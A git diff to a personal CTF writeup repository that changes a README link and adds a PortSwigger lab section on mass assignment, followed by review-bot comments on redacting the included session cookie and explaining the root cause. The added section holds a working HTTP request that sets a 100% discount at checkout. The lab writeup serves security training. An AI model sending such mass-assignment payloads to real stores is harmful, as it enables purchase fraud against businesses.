diff --git a/README.md b/README.md index e58c56b..fd7ef04 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ A repository to collect my writeups and notes on CTF challenges I did. -https://sirius-a.github.io/ctf-writeups/ +https://ctf.zuberfab.io/ ## Getting Started diff --git a/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md index 7c8db90..3a1cf07 100644 --- a/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md +++ b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md @@ -17,4 +17,15 @@ Content-Length: 12 ## Exploiting a mass assignment vulnerability +It is possible to send a `POST` request to the `checkout` endpoint with 100% +discount. +``` +POST /api/checkout HTTP/2 +Host: 0af0002804d0d47e86ff4f3200e200aa.web-security-academy.net +Cookie: session=42Y5LbakIMHg3C8i7egh1Kt9P1E6UWD9 +Content-Type: application/json;charset=UTF-8 +[...] + +{"chosen_discount":{"percentage": 100},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":1,"item_price":133700}]} +```
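Review bot: the URL swap on README.md line 6 (`-https://sirius-a.github.io/ctf-writeups/` → `+https://ctf.zuberfab.io/`) updates only the README; if the static-site configuration under `docs/` or any other page still references the old GitHub Pages address, change them in the same commit so the README and the published site agree, and consider leaving a one-line note that the old address redirects (if it does), since existing links to the writeups will otherwise break silently.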
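Review bot: the session cookie in the added request (`Cookie: session=42Y5LbakIMHg3C8i7egh1Kt9P1E6UWD9`) should be redacted or replaced with a placeholder such as `session=<redacted>` before committing; even for an expired lab token, checking live credentials into a public writeup repository is a habit worth avoiding, and the same applies to the instance-specific `Host:` value. Two smaller points in the same hunk: the opening fence immediately follows the prose line `discount.` with no blank line, which some Markdown renderers will not treat as a fence, and the fence has no language tag (`http` would give syntax highlighting and matches the content). Finally, the section states that a 100% discount can be sent but never names the root cause; one sentence explaining that the `/api/checkout` handler binds the client-supplied `chosen_discount` object straight into the order instead of recomputing price and discount server-side from an allowlist of bindable fields would make the "mass assignment" heading self-explanatory and tell the reader what the fix looks like.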